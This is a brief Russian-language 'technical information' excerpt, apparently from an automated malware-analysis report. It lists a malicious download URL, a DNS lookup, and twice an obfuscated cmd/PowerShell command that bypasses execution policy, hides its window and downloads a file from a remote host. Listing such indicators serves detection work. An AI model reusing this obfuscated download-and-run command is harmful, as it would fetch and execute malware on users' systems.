Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^W^ErsHE^LL^.eX^e -^E^xE^cUTIOn^POL^Ic^y bYp^A^S^s ^-NO^pr^oFi^LE^ -^w^I^n^do^WsT^y^LE h^IDDEN (N^eW-o^bJEcT^ ^sY^s^TEM.^NE^t^.^WebcLi^enT)^.^dOw^N^l^o^adfILE('http://www...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "PO^W^ErsHE^LL^.eX^e -^E^xE^cUTIOn^POL^Ic^y bYp^A^S^s ^-NO^pr^oFi^LE^ -^w^I^n^do^WsT^y^LE h^IDDEN (N^eW-o^bJEcT^ ^sY^s^TEM.^NE^t^.^WebcLi^enT)^.^dOw^N^l^o^adfILE('http://www...' (со скрытым окном)